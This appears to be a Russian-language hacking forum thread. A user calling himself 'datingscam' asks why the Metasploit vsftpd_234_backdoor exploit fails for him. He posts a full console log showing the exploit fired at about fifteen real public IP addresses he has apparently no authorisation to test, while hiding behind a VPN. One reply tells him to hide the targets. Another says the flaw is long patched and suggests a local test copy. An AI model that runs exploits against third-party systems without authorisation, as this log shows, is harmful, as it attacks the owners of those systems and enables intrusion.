• Открыта запись на вторую часть курса по анонимности и безопасности в сети интернет "Paranoid II" от команды codeby. Анонимные роутеры, Подъём, настройка и администрирование Tor-ноды, Работа с железом ПК, Удаление аппаратных закладок, Минимизация рисков, Авторские разработки и многое другое. Подробнее ...

Проблема vsFTPd 2.3.4, не удаётся взломать.

datingscam

datingscam

Member
19.05.2019
11
2
Всем привет, сегодня начал активно искать цели для ПЕНТЕСТА! Начал с поиска серверов, которые стоят на vsftpd_234_backdoor.
В общем, начинаю нормально вводить RHOSTS, зная, что сервер, к которому сейчас будет выполнена попытка коннекта, стоит на vsftpd2.3.4.
И что же? Какой итог? Вот такой.... и так много раз, ни одной удачной попытки, может знает кто, в чем проблема?
Добавлю, что юзаю VPN NordVPN (P2P).

Лог:
Код:
msf5 > use exploit/unix/ftp/vsftpd_234_backdoor
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target address range or CIDR identifier
   RPORT   21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 37.139.55.5
RHOSTS => 37.139.55.5
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 37.139.55.5:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 37.139.55.5:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 157.107.255.120
RHOSTS => 157.107.255.120
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 157.107.255.120:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 157.107.255.120:21 - USER: 530 Permission denied.
[-] 157.107.255.120:21 - This server is configured for anonymous only and the backdoor code cannot be reached
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 91.48.126.253
RHOSTS => 91.48.126.253
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[-] 91.48.126.253:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (91.48.126.253:21).
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 80.92.127.162
RHOSTS => 80.92.127.162
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 80.92.127.162:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 80.92.127.162:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 61.64.111.92
RHOSTS => 61.64.111.92
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[-] 61.64.111.92:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (61.64.111.92:21).
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 157.107.192.114
RHOSTS => 157.107.192.114
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 157.107.192.114:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 157.107.192.114:21 - USER: 530 Permission denied.
[-] 157.107.192.114:21 - This server is configured for anonymous only and the backdoor code cannot be reached
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 157.107.192.30
RHOSTS => 157.107.192.30
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 157.107.192.30:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 157.107.192.30:21 - USER: 530 Permission denied.
[-] 157.107.192.30:21 - This server is configured for anonymous only and the backdoor code cannot be reached
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 62.33.191.133
RHOSTS => 62.33.191.133
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 62.33.191.133:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 62.33.191.133:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 193.33.132.38
RHOSTS => 193.33.132.38
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 193.33.132.38:21 - Banner: 220 vsFTPd 2.3.4+ (ext.1) ready...
[*] 193.33.132.38:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 62.122.102.76
RHOSTS => 62.122.102.76
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[-] 62.122.102.76:21 - Exploit failed [unreachable]: Rex::ConnectionTimeout The connection timed out (62.122.102.76:21).
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 176.62.93.214
RHOSTS => 176.62.93.214
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 176.62.93.214:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 176.62.93.214:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 78.110.54.200
RHOSTS => 78.110.54.200
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 78.110.54.200:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 78.110.54.200:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 31.211.19.31
RHOSTS => 31.211.19.31
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 31.211.19.31:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 31.211.19.31:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 212.12.74.139
RHOSTS => 212.12.74.139
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 212.12.74.139:21 - Banner: 220 (vsFTPd 2.3.4)
[-] 212.12.74.139:21 - Exploit failed [disconnected]: Errno::ECONNRESET Connection reset by peer
[*] Exploit completed, but no session was created.
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 78.41.92.226
RHOSTS => 78.41.92.226
msf5 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 78.41.92.226:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 78.41.92.226:21 - USER: 331 Please specify the password.
[*] Exploit completed, but no session was created.
 
Последнее редактирование:
digw33d

digw33d

Премиум
23.01.2018
101
88
закрыл бы таргеты. зачем палить?
 
ghostphisher

ghostphisher

гарант codeby
Gold Team
07.12.2016
2 522
3 355
За 8 лет дыру уже пофиксили. Если хочется тестов - можно скачать архивный не патченный vsftpd2.3.4. , поставить себе на локалхост и опробовать.
 
Мы в соцсетях: